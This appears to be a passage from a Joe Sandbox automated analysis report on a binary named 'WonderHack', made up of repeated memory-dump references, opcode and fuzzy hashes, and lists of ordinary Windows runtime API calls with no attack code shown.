                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7f43a70edf38c219a6d606207a581f32db44dbdd284d0e6b4f6fdfe87cb8eac9
                                                                                                                                                                                                                                                                          • Instruction ID: 0c6308c8bc9279439312ad6f1ef6f4f91312191d00fa8698ba53596e2c2af48b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f43a70edf38c219a6d606207a581f32db44dbdd284d0e6b4f6fdfe87cb8eac9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F02B3630030557CB149F75EC45BAABF98EFC1724F0A406AEB168B290CA71DA86E790
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CAE2A3,?,20001004,00000000,00000002,?,?,00CAD1B5), ref: 00CB3EE0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                          • Opcode ID: 97a2a1d9390168833e30bb13a8b30580d13b3bf731d5accd3dedc8bed01749b8
                                                                                                                                                                                                                                                                          • Instruction ID: ab29c7c82870ba287a429d2db1ab9dd39efb12d2f13159d9599d0afe2d03a945
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97a2a1d9390168833e30bb13a8b30580d13b3bf731d5accd3dedc8bed01749b8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E04F31504168BBCF226F61DC04FEE3E66EF447A0F044421FD16661A1CB36CA20BAD5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00CA6521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6b6766383acd2878f4920309f9c6f565c1178b2277445d3d8da3fe04b0e620c5
                                                                                                                                                                                                                                                                          • Instruction ID: ae79f2ed509b575c822acde852661b711e12529ece3c8de084daa974c79e01da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6766383acd2878f4920309f9c6f565c1178b2277445d3d8da3fe04b0e620c5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: 504137259432b8d7213b59965a83ba99af86107ba9c7715475e2a2e6900c48f9
                                                                                                                                                                                                                                                                          • Instruction ID: e865f645e4dc02dfb2be90844ee47f99c8d8a8b95182d956667c3bf876f6ca38
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 504137259432b8d7213b59965a83ba99af86107ba9c7715475e2a2e6900c48f9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28A001746032058BA7548F35AB0A71D3AADAA9A691705406EA50AC5170EB39A451AA01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 41b83c2ca3de056dfcd879212a9cbca79c38de6be81e499b0d8859161e080eee
                                                                                                                                                                                                                                                                          • Instruction ID: e5796efa2471ba2136c02968c650b7e011c83e18a2448cad9c93ff7777c346ac
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b83c2ca3de056dfcd879212a9cbca79c38de6be81e499b0d8859161e080eee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D05179B4D0020E9FCF40DFA8D596AEEBBF4AB09350F24545AE815FB310D734AA41CBA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a31fc2ec69f4fb4ab37674a276921e4a8761421fb0ab044740df4e6e2dea759c
                                                                                                                                                                                                                                                                          • Instruction ID: 8e3dee7b08d06271cfcca3d96e8d6f801256775d9d44d250ed33198f4cbebef5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a31fc2ec69f4fb4ab37674a276921e4a8761421fb0ab044740df4e6e2dea759c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0D06C3A641A58AFC210CF8AE440E41F7A8FB89670B158066EA0993B20D235F811CEE0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                                          • Opcode ID: 77f5f5fedec21017400d8b78638b40a644ce5e305bcc3cafdfc137131e6b4039
                                                                                                                                                                                                                                                                          • Instruction ID: a8e0d08877bb06f5074c0d0773a3205a02fa899fdc6ab858cbbd762f0da4bbf7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77f5f5fedec21017400d8b78638b40a644ce5e305bcc3cafdfc137131e6b4039
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1671D572900249ABEF219E94CC41FAF7BBA9F46310F2D405EEA24A7292D735DE41D760
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00CA6AB0
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00CA6ADC
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00CA6B1B
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CA6B38
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CA6B77
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00CA6B94
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CA6BD6
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA6BF9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b34bb505e1889d5c86595bb03a3b6a7ca9c7d7ceaa1bcd94c6a1ce3aa47a9ad
                                                                                                                                                                                                                                                                          • Instruction ID: b7be9adda4dc27538fdd1e9c0295adc40ed1911ae1f8d0a9c87c66c7ce536fa3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b34bb505e1889d5c86595bb03a3b6a7ca9c7d7ceaa1bcd94c6a1ce3aa47a9ad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651C07250021BAFEB215F60CC45FAB7BA9EF42758F294024F965E6190DB34CE00DBA0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                          • Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                          • Instruction ID: f6f6bc058c12dca107fe5675ad845bc3dd5a188f07aa252c7664272107313192
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8B14872A013559FEB11CF68CC82BEEBFA5EF55310F184165E915AF282D278DE01CBA1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00CA7977
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00CA797F
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00CA7A08
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00CA7A33
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00CA7A88
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 06052fc65e2a72dc4955c65b17dde0779f03448452133aefca71d6be2c9b8136
                                                                                                                                                                                                                                                                          • Instruction ID: e158f5b1b20e50a0ef8e4057a83636fbe76421c2bcca0a7bf23284bfa2aa0f52
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06052fc65e2a72dc4955c65b17dde0779f03448452133aefca71d6be2c9b8136
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241C630A0421AABCF10DF68CC85A9E7BB5BF46318F148656E8259B352D731AF41DB91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA6CC1
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA6CCF
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA6CE0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                          • Opcode ID: 841e0f7ef5d23229aeebbc9187fe9b6df0b103e41257cbbe7d1ddc2286e2dec7
                                                                                                                                                                                                                                                                          • Instruction ID: 2283c84a61df78d3d306585efdf2d6ce1b01a186be84557ac83f16680a42a691
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 841e0f7ef5d23229aeebbc9187fe9b6df0b103e41257cbbe7d1ddc2286e2dec7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBD0C7795563146B83105FF5FC0DF5D3BA4EB09712305007EFC06D3290D6B458418F92
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5d541e2e0d0a3c44f12ace1ce15b3c729264545327d71a974626022d0c407c29
                                                                                                                                                                                                                                                                          • Instruction ID: 3aa8874d493aebe0d8cdc571d17dd62c40ece73713407a0000f69f62a4b6ec41
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d541e2e0d0a3c44f12ace1ce15b3c729264545327d71a974626022d0c407c29
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20B10370A04249AFDF11DFA9D8C1BFD7BB4BF4A304F148159E411AB2A2C7709E42DBA5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00CB1FA5,00CA7361,00CA6681), ref: 00CB1FBC
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB1FCA
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB1FE3
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00CB1FA5,00CA7361,00CA6681), ref: 00CB2035
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 80c2a5f3b6dc901653dc783c2414e50e2c0e34a00814ea4153bc059e75d3149f
